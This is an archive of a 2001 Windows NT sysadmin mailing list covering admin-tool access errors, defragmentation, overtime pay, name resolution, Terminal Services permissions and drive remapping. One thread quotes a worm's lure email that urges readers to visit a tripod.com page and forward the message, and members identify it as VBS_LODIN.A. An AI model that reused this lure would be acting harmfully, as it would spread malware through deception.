Sent: Tuesday, August 28, 2001 7:56 AM
To: NT System Admin Issues
Subject: RE: Domain Admin cannot use admin tools



Ok gang. Thanks for all the help both on and off list. The answer had to be in the Netlogon service, according to Novell.

I tried to reboot the PDC, but was told I had no rights to do so. AHA you scoundrel, says I. I'll show you who's in charge here!. 

Warily pressing the Big Red Button, the administrator jumps quickly backward, allowing the defiant machine to die gracefully. 

Rise and Heal thyself! I yelled. Slowly, the beast began to stir, eventually coming to full life and, having been beaten into submission, was henceforth properly responsive to all demands made of it.

Steve Kelsay
Network Administration Group
South Carolina Department of Revenue
301 Gervais Street
Columbia, SC 29201


(803) 898-5522


 [EMAIL PROTECTED] 08/28/01 09:57AM 
Thanks agin.


No, system error 5 (access denied) is returned. 
I'm stumped!


 [EMAIL PROTECTED] 08/28/01 09:41AM 
Can you add a dummy user from the command line using NET USER command? 




-Original Message-
From: Steve Kelsay [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, 28 August 2001 14:40
To: NT System Admin Issues
Subject: RE: Domain Admin cannot use admin tools



Thanks for the reply.
No, we have a single domain, no trusts. Netlogon is running fine. Nothing in
the event logs pertinent to the problem.


 [EMAIL PROTECTED] 08/28/01 09:19AM 
trusts? have your account permissions been revoked in the trusted domain?
contact those administrators and verify membership? i get the message but i
am no longer an account op in the trusted domain...


===
Lerone Streeter
System Analyst
Abbott LBG
[EMAIL PROTECTED] 
===


-Original Message-
From: Steve Kelsay [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, August 28, 2001 8:55 AM
To: NT System Admin Issues
Subject: Domain Admin cannot use admin tools



Strange thing started happening last week. All the domain administrators
have lost the capability of using usrmgr.exe and srvmgr.exe! They come up,
but any attempt to make changes gets ACCESS DENIED. 


All accounts are still domain admins, and all rights remain unchanged.
Checked for viruses and resynched, but no change. We are running Novell
Account manager in parallel, but nothing has changed with it either,
although I am most suspicious of this as the cause, but I need to cover all
the bases.


Has anyone seen this before?


Steve Kelsay
Network Administration Group
South Carolina Department of Revenue
301 Gervais Street
Columbia, SC 29201


(803) 898-5522



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Domain Admin cannot use admin tools

2001-08-28 Thread RZorz
Title: RE: Domain Admin cannot use admin tools





yuk. good luck


-Original Message-
From: Steve Kelsay [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, August 28, 2001 8:25 AM
To: NT System Admin Issues
Subject: RE: Domain Admin cannot use admin tools



Yeah. Lost my head. It's just one of those days. They just laid off 288 out of 700 people, and two days later they announce ANOTHER 300 million dollar deficit, which will require another 5-7% layoff. So much for government jobs being secure!

I just had to do something out of the ordinary to vent!


 [EMAIL PROTECTED] 08/28/01 11:06AM 
Frustrated screenwriter? Nice to know some things never change - when in
doubt - reboot. 


-Original Message-
From: Steve Kelsay [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, August 28, 2001 7:56 AM
To: NT System Admin Issues
Subject: RE: Domain Admin cannot use admin tools



Ok gang. Thanks for all the help both on and off list. The answer had to be
in the Netlogon service, according to Novell.


I tried to reboot the PDC, but was told I had no rights to do so. AHA you
scoundrel, says I. I'll show you who's in charge here!. 


Warily pressing the Big Red Button, the administrator jumps quickly
backward, allowing the defiant machine to die gracefully. 


Rise and Heal thyself! I yelled. Slowly, the beast began to stir,
eventually coming to full life and, having been beaten into submission, was
henceforth properly responsive to all demands made of it.


Steve Kelsay
Network Administration Group
South Carolina Department of Revenue
301 Gervais Street
Columbia, SC 29201


(803) 898-5522


 [EMAIL PROTECTED] 08/28/01 09:57AM 
Thanks agin.


No, system error 5 (access denied) is returned. 
I'm stumped!


 [EMAIL PROTECTED] 08/28/01 09:41AM 
Can you add a dummy user from the command line using NET USER command? 




-Original Message-
From: Steve Kelsay [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, 28 August 2001 14:40
To: NT System Admin Issues
Subject: RE: Domain Admin cannot use admin tools



Thanks for the reply.
No, we have a single domain, no trusts. Netlogon is running fine. Nothing in
the event logs pertinent to the problem.


 [EMAIL PROTECTED] 08/28/01 09:19AM 
trusts? have your account permissions been revoked in the trusted domain?
contact those administrators and verify membership? i get the message but i
am no longer an account op in the trusted domain...


===
Lerone Streeter
System Analyst
Abbott LBG
[EMAIL PROTECTED] 
===


-Original Message-
From: Steve Kelsay [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, August 28, 2001 8:55 AM
To: NT System Admin Issues
Subject: Domain Admin cannot use admin tools



Strange thing started happening last week. All the domain administrators
have lost the capability of using usrmgr.exe and srvmgr.exe! They come up,
but any attempt to make changes gets ACCESS DENIED. 


All accounts are still domain admins, and all rights remain unchanged.
Checked for viruses and resynched, but no change. We are running Novell
Account manager in parallel, but nothing has changed with it either,
although I am most suspicious of this as the cause, but I need to cover all
the bases.


Has anyone seen this before?


Steve Kelsay
Network Administration Group
South Carolina Department of Revenue
301 Gervais Street
Columbia, SC 29201


(803) 898-5522



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: RE: Defrag: is it necessary for NTFS?

2001-08-27 Thread RZorz
Title: RE: RE: Defrag: is it necessary for NTFS?





I haven't as yet defragged my servers, which probably need it more than my desktops. But I can definitely tell when I log into a desktop that needs defragging. I can hear the drives churning. Desktops are all nt4 w/ ntfs.

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Monday, August 27, 2001 7:45 AM
To: NT System Admin Issues
Subject: Re:RE: Defrag: is it necessary for NTFS?



I have exprienced slow data access from badly fragmented NTFS drives. I don't
have any recent data nor do I have hard data from a test environment. I do
know that after defragging my users' hard drives their computer response times
more than doubled. IE it took less than half the previous time to open the same
files.


ralph


Reply Separator
Subject: RE: Defrag: is it necessary for NTFS?
Author: NT System Admin Issues [EMAIL PROTECTED]
Date: 08/27/2001 2:22 PM


but when the drives get full, the whole systems bogs down and then to defrag
can take forever and no one of the defrag tools do a good job when you have
reached this point.


So my humble opinion is to do it and do it frequently using Diskkeeper
FragGaurd on all the time while there is lots of space to operate in.


Erich


-Original Message-
From: Josu Lekaroz [mailto:[EMAIL PROTECTED]]
Sent: Monday, August 27, 2001 2:16 PM
To: NT System Admin Issues
Subject: Re: Defrag: is it necessary for NTFS?



Maybe the benefits exist but I have never had to defrag a drive on NT.


Perhaps someone has benchmarked drives before an after defragmentation.


It'd be nice to see results.


Regards
josu


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: What do you get for Over Time

2001-08-27 Thread RZorz
Title: RE: What do you get for Over Time





I think there's a whole bunch of exceptions, and unfortunately for many of us, I think IT got to be an exception. Of course that may have been on the state level, although I could swear it was the National Labor Relations Board that audited our company at the time. 

-Original Message-
From: Sean Martin [mailto:[EMAIL PROTECTED]]
Sent: Monday, August 27, 2001 9:51 AM
To: NT System Admin Issues
Subject: RE: What do you get for Over Time



I've been a salaried, non-exempt employee for the past 3 years and I've
always gotten time and a half for any over-time I put in. However, our HR
person recently contacted the Department of Labor and found out some
interesting facts. Anyone who is not in a position where 2 or more people
work directly under them, is considered a non-exempt employee (at least in
our case). 


Regards,

Sean Martin, MCSE
Network Administrator
Ribelin Lowell  Company
Insurance Brokers, Inc.
3111 C Street, Suite 300
Anchorage, Alaska 99503
Ph: (907) 561-1250
Fax: (907) 561-4315
Cell: (907) 229-0885
Email: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] 



-Original Message-
From: Greg Page [mailto:[EMAIL PROTECTED]]
Sent: Monday, August 27, 2001 8:29 AM
To: NT System Admin Issues
Subject: RE: What do you get for Over Time



I didn't think you did, I was pointing out the math.


Greg



-Original Message-
From: Seth M. Kusiak [mailto:[EMAIL PROTECTED]] 
Sent: Monday, August 27, 2001 12:17 PM
To: NT System Admin Issues
Subject: Re: What do you get for Over Time



It was ONLY an example. I don't make 10K a year.


Greg Page writes: 


 If you made $10,000 a year that would be $5.00 and hour.
 
 I haven't had and overtime paying job in years but we've always 
 managed to snag lots of extra time off when we can. The nature of the 
 IT beast is that sometimes there is OT involved and long nights and 
 weekends. Just part of the job.
 
 Greg
 
 
 -Original Message-
 From: Seth M. Kusiak [mailto:[EMAIL PROTECTED]]
 Sent: Monday, August 27, 2001 9:25 AM
 To: NT System Admin Issues
 Subject: Re: What do you get for Over Time 
 
 
 I'm salaried, but if I work over 45 hours in a week then for each hour 
 that
 I work past 45, I get half of my base rate. Example: 
 
 If I make $10,000 a year and my hourly rate is $10.00, for each hour 
 that I
 work past 45, I would get $5.00 an hour that is paid quarterly. 
 
 I really like this because I usually end up with a few thousand extra 
 each
 quarter. 
 
 ~Seth
 
 Mathews, James E. writes:
 
 I was wondering if anyone has any policies set up for Over Time.
 
 The reason I ask is one of the other network guys and myself have put
 in about 40 hours over time this month and we receive nothing for it. 
 
 Just wondering what policies are set up at other companies to
 compensate for over time. 
 
 We consistently work about 8-12 hours over a month and we get no time 
 off
 or
 anything for this. 
 
 Management keeps telling us it is just part of our job and we can not
 get any comp time even though we are only scheduled for 
 
 40 hours a week.
 
 
 
 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
 
 
 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
DO NOT read, copy or disseminate this communication unless you are the
intended addressee. This e-mail communication contains confidential and/or
privileged information intended only for the addressee. If you have received
this communication in error, please call us immediately at (907) 561-1250
and ask to speak to the sender of the communication. Also, please e-mail the
sender and notify the sender immediately that you have received the
communication in error.


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Hi !

2001-08-27 Thread RZorz
Title: RE: Hi !





Hey Roger - is this it?


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]
Sent: Monday, August 27, 2001 2:08 PM
To: NT System Admin Issues
Subject: Hi !



Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too.

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Hi !

2001-08-27 Thread RZorz
Title: Message



Does 
it have a name yet? 

  -Original Message-From: Don Ely 
  [mailto:[EMAIL PROTECTED]]Sent: Monday, August 27, 2001 2:17 
  PMTo: NT System Admin IssuesSubject: RE: Hi 
  !
  Yes, 
  this is the one
  

-Original Message-From: 
[EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] 
Sent: Monday, August 27, 2001 2:13 PMTo: NT System 
Admin IssuesSubject: RE: Hi !
Hey Roger - is this it? 
-Original Message- From: 
[EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] 
Sent: Monday, August 27, 2001 2:08 PM To: NT System Admin Issues Subject: Hi 
! 
Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get 
some knowledge and prevent somebody hack you. Forword this mail to help all 
your friends too.
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Hi !

2001-08-27 Thread RZorz
Title: Message



thanks

  -Original Message-From: Bill Higgins 
  [mailto:[EMAIL PROTECTED]]Sent: Monday, August 27, 2001 2:27 
  PMTo: NT System Admin IssuesSubject: RE: Hi 
  !
  According to TrendMicro...
  
  VBS_LODIN.A
  
  
  http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_LODING.A
  
  
  
-Original Message-From: 
[EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED]]Sent: Monday, August 27, 2001 
14:25To: NT System Admin IssuesSubject: RE: Hi 
!
Does it have a name yet? 

  -Original Message-From: Don Ely 
  [mailto:[EMAIL PROTECTED]]Sent: Monday, August 27, 2001 
  2:17 PMTo: NT System Admin IssuesSubject: RE: Hi 
  !
  Yes, this is the one
  

-Original Message-From: 
[EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] 
Sent: Monday, August 27, 2001 2:13 PMTo: NT System 
Admin IssuesSubject: RE: Hi !
Hey Roger - is this it? 
-Original Message- From: 
[EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] 
Sent: Monday, August 27, 2001 2:08 PM To: NT System Admin Issues Subject: Hi 
! 
Hi, how are you ? I am fine here. Please read the page 
http://pcControl.tripod.com/ to 
get some knowledge and prevent somebody hack you. Forword this mail to 
help all your friends too.
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Hi !

2001-08-27 Thread RZorz
Title: RE: Hi !





yes I have. 


-Original Message-
From: Stephen Berg [mailto:[EMAIL PROTECTED]]
Sent: Monday, August 27, 2001 3:07 PM
To: NT System Admin Issues
Subject: Re: Hi !



Has anyone sent an email to Tripod.com to ask them to shut down that web
page?


On Mon, 27 Aug 2001 [EMAIL PROTECTED] wrote:


 Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too.

 
 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
 



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: NetBIOS name resolves to domain name

2001-08-24 Thread RZorz
Title: RE: NetBIOS name resolves to domain name





That's how my setup was, and when my internet connection failed I'd have problems. So now I have DNS set up internally too, even if it's only the 3rd option. 

-Original Message-
From: Niki Blowfield [mailto:[EMAIL PROTECTED]]
Sent: Friday, August 24, 2001 7:11 AM
To: NT System Admin Issues
Subject: RE: NetBIOS name resolves to domain name



The domain that is being resolved, servername.co.uk, is not one of our
servers


We don't have any DNS servers on our LAN, we use our ISP's



-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] 
Sent: 24 August 2001 14:36
To: NT System Admin Issues
Subject: Re: NetBIOS name resolves to domain name




Niki:


The ping difference means that DNS (or the hosts file) is resolving the
one server and WINS (lmhosts file) the other. For example, I have 2
servers (server01 and server02). I have a DNS namespace of
div1.company.com. I have both valid WINS server(s) and DNS server(s).
The 1st server, server01 is registered in DNS and the 2nd is not. My
client is setup to use DNS to first resolve the name.


When I ping server01, it replies server01.div1.company.com
[192.168.100.50], when I ping server02 DNS does not have this host name
so WINS ends up replying with server02 [192.168.100.55]. Either way
should work and would not matter to Exchange. I would check to make sure
both servers are properly registered in WINS.


Go to the CMD prompt and type: NBTSTAT -a server01 (your server name
goes
here)


You should get a listing at a minimum similar to this:
 NetBIOS Remote Machine Name Table


 Name Type Status



--
 SERVER02 00 UNIQUE Registered
 DOM01 00 GROUP Registered
 SERVER02 20 UNIQUE Registered


 MAC Address = 99-99-99-99-99-99


The first 00 is the unique computername registration by the
workstation service. The other 00 group is the domain name registered
saying that this computer is a member of this domain or workgroup. The
20 unique is registered by the server service I believe. You may
certainly have other entries besides these, especially if the one server
is the PDC.


I would double check your WINS settings and make sure the servers are
both registered properly in WINS. Whether the ping to a server is
answered by WINS or DNS should not matter to the NetBIOS resolution for
the Exchange server you are trying to add. Pinging any server in my
organization will always give you a servername.div1.company.com answer
to the ping.


Thanks







 Niki Blowfield


 niki.blowfield@partit To: NT System
Admin Issues 
 ion.co.uk
[EMAIL PROTECTED] 
 cc:


 08/24/2001 07:56 AM Subject: Netbios
name resolves to domain name 
 Please respond to NT


 System Admin Issues












Hi


We have an NT4 Domain, with one Exchange 5.5 server on the PDC.


I have attempted to install another Exchange server into the site, but
the installation fails at the end, with an error asking me to check if
the directory service is started.


The service is started, so upon investigation of technet, it mentions
name resolution on the two servers.


I have checked, and when I ping the server name of the server I'm trying
to install, it resolves it to a domain name. e.g.;


ping NEWEXCHSERVER


pinging NEWEXCHSERVER.CO.UK [201.167.xxx.xxx]


etc etc


Whereas, if I ping the other way, it works okay. e.g.


ping EXISTINGEXCSERVER


pinging EXISTINGEXCSERVER [192.168.2.25]


etc


I have entered the new server into the lmhosts file of the exchange
server and rebooted, but no difference.


could this be the problem? if so, any ideas on a resolution


Nik
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Scheduling a Defrag in 2000!

2001-08-23 Thread RZorz
Title: RE: Scheduling a Defrag in 2000!





I thought the guys at sysinternals had a way to do this.


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Thursday, August 23, 2001 8:54 AM
To: NT System Admin Issues
Subject: Re: Scheduling a Defrag in 2000!



There is no default way. You cannot schedule it in the task scheduler and you have to be a admin to run it. A couple solutions one go and Diskeeper or some other third pary app. Also I have found freeware called Autodefrag where you can through the task scheduler but the user will have to have admin priveleges. You can find autodefrag at www.morphasys.com.

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Access to Terminal Server

2001-08-23 Thread RZorz



then 
go thruwww.sunbelt-software.com

  -Original Message-From: David N. Precht 
  [mailto:[EMAIL PROTECTED]]Sent: Thursday, August 23, 2001 10:34 
  AMTo: NT System Admin IssuesSubject: RE: Access to 
  Terminal Server
  Would be nice to see , yet I get : 
  The page cannot be displayed
  Gotta love it 
  .
  
-Original Message-From: Sullivan, Glenn 
[mailto:[EMAIL PROTECTED]]Sent: Thursday, August 23, 2001 
09:58To: NT System Admin IssuesSubject: RE: Access to 
Terminal Server
Go 
to http://www.win2knews.com and sign 
up...
Glenn Sullivan, MCSE+I MCDBA 
David Clark Company Inc. 

  -Original Message-From: Correa, Andre 
  [mailto:[EMAIL PROTECTED]]Sent: Thursday, August 23, 2001 9:48 
  AMTo: NT System Admin IssuesSubject: RE: Access to 
  Terminal Server
  
  I 
  have been looking for that very piece of 
  information.
  
  How 
  do I sign up for the W2K news email 
  letter?
  
  -Original 
  Message-From: John 
  Brozycki [mailto:[EMAIL PROTECTED]]Sent: Thursday, August 23, 2001 9:21 
  AMTo: NT System Admin 
  IssuesSubject: RE: 
  Access to Terminal Server
  
  If you get 
  Stu's W2K news email newsletter he just sent one out this morning that had 
  a snippet from Mark Minasi explaining how to do this very thing. 
  Here's the quote from Mark Minasi:
  How to let 
  Non-Domain Admins connect to a Win2K Server via Terminal Services in 
  Remote Admin mode? Here's what Mark Minasi found out: I really 
  like Terminal Services for Windows 2000 in the "Remote Administration" 
  mode; it lets up to two people use Terminal Services to remotely control a 
  Windows 2000 Server, and doesn't require me to buy any Terminal Server 
  client licenses. But when you select "Remote Administration" mode for 
  Terminal Services, then Terminal Services only lets members of the Domain 
  Admins group log into Terminal Services. I wanted to let regular 
  old users log in, but didn't know how. While teaching a class for a large 
  communications company this month, I found out how. Open Terminal 
  Services Configuration (it's in Administrative Tools) In the command 
  pane (the left-hand pane of the MMC console), click on "Connections." 
  In the right-hand pane, you'll see an icon representing a connection 
  (a hard disk atop a network connection) and the words "RDP-Tcp," "tcp," 
  and "Microsoft RDP 5.0." Double-click the icon to bring up its Properties 
  dialog, or just right-click the icon and choose "Properties." You'll see a 
  property page labeled "RDP-Tcp Properties." Click the "Permissions" 
  tab. Note that right now, the tab shows only the System account and 
  the local Administrators group. Add any person or group that you like, and 
  they'll be able to log onto the server via Terminal Services. 
  
  At 11:45 AM 8/17/2001 
  -0400, you wrote:
   Sorry for not mentioning this 
  the first time, but Terminal Services is in Admin Mode. In order to 
  accomplish this before, I had to give others Admin rights. Now I don't 
  have to, I can just give them through policies what they need to 
  do.Thanks.Terry Caleb-- Original Message 
  --From: "Kevin Miller" 
  [EMAIL PROTECTED]Reply-To: "NT System Admin 
  Issues" [EMAIL PROTECTED]Date: Fri, 17 Aug 
  2001 11:34:25 -0700Checking I have a locked down Demo 
  account with no rights logininginto a remote mode TS? I think 
  anyone can login as long as they have thecheck box done.. 
  Or am I just smoking crack?Kevinm QWSZC, 
  VRY+Y, NFH, SAD-VF, 
  DERSDESDFG~~~More 
  letters after my name makes me 
  Smarter.~~~please 
  respond back to rent this ad space for your 
  needs-Original Message-From: Kevin 
  Lundy [mailto:[EMAIL PROTECTED]] Sent: Friday, 
  August 17, 2001 8:31 AMTo: NT System Admin IssuesSubject: 
  RE: Access to Terminal ServerI think the issue may 
  be in how Terry originally installed TS - inremote admin mode 
  maybe instead of application server? If remote adminmode, I 
  don't think there is any way around the admin permissions -that's 
  one of MS's way of ensuring you don't bypass proper 
  licensing.-Original Message-From: Kevin 
  Miller [mailto:[EMAIL PROTECTED]]Sent: 
  Friday, August 17, 2001 2:28 PMTo: NT System Admin 
  IssuesSubject: RE: Access to Terminal 
  ServerJust give the user logon to TS rights in 
  there AD profile.Kevinm QWSZC, VRY+Y, NFH, SAD-VF, 
  DERSDESDFG~~~More 
  letters after my name makes me 
  

RE: Changing Mappings after server re-name

2001-08-23 Thread RZorz
Title: RE: Changing Mappings after server re-name





I think what they're trying to say is it's difficult to query each machine, get the shares, and then replace them. You might end up spending more time trying to create a sophisticated script than just trying to standardize using, for example, ifmember. 

How many users are we talking about? 


-Original Message-
From: Tom Grabowski [mailto:[EMAIL PROTECTED]]
Sent: Thursday, August 23, 2001 1:20 PM
To: NT System Admin Issues
Subject: RE: Changing Mappings after server re-name



You have all been a great help. 
Yes I know what net use * /delete does. And it is exactly what I don't want
to do. 
We have users manually mapped because that is the way it thank you for your
thought full insight on logon scripts, hmmm, but I thought that was what my
initial request stated;
Is there a way through 2000 logon scripts or, 3rd party software, that
upon logon the users drive mappings can be reviewed and through the use of
variables accomplish something like this;
and lastly thank you for the Just use net use /delete n: I will go to each
workstation find out their mapped drives to the old server and create
individual logon scripts for each different development group or department.
Trying to eliminate the sneaker net through Logon Scripts
Thanks anyway for the assists. If I find a way to do what I want I will
post it, maybe what we have here is a failure to communicate.



-Original Message-
From: Tom Grabowski [mailto:[EMAIL PROTECTED]]
Sent: Thursday, August 23, 2001 9:59 AM
To: NT System Admin Issues
Subject: Changing Mappings after server re-name



Does anyone know if it is possible to re-map existing drives through a
log on script after changing a server name? This is the situation we
have; We are 'upgrading', format, install fresh, and restore
information, one of our servers from NT4 to 2000 and in the process we
are renaming the server from APPS_SERVER to APPS2, to keep in line with
Internet DNS naming standards. I know that there will be numerous
people with mapped drives to this server such as Prog on 'Apps_Server'
(P:). Is there a way through 2000 logon scripts or, 3rd party
software, that upon logon the users drive mappings can be reviewed and
through the use of variables accomplish something like this; if
%drive_leter% = 'Apps_Server' then net delete 'Apps_Server' and Net Use
'Apps2', to whatever drive letter the directory was originally mapped.
We need to use a variable for the drive letter because there are
numerous shared directories that are mapped to numerous different Drive
Letters, most done manually by department or individual developers.


Thanks in advance for any help.


Tom Grabowski



**
This email and any files transmitted with it are confidential and
intended solely for the use of the individual or entity to whom they are
addressed. If you have received this email in error please notify the
e-mail originator.


This footnote also confirms that this email message has been swept by
MIMEsweeper for the presence of computer viruses. However, please check
this e-mail for virus infection for which CDG Management LLC accepts no
responsibility
**



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



**
This email and any files transmitted with it are confidential and
intended solely for the use of the individual or entity to whom they are
addressed. If you have received this email in error please notify the
e-mail originator.


This footnote also confirms that this email message has been swept by
MIMEsweeper for the presence of computer viruses. However, 
please check this e-mail for virus infection for which
CDG Management LLC accepts no responsibility
**



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



**
This email and any files transmitted with it are confidential and
intended solely for the use of the individual or entity to whom they
are addressed. If you have received this email in error please notify
the e-mail originator.


This footnote also confirms that this email message has been swept by
MIMEsweeper for the presence of computer viruses. However, 
please check this e-mail for virus infection for which
CDG Management LLC accepts no responsibility
**



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm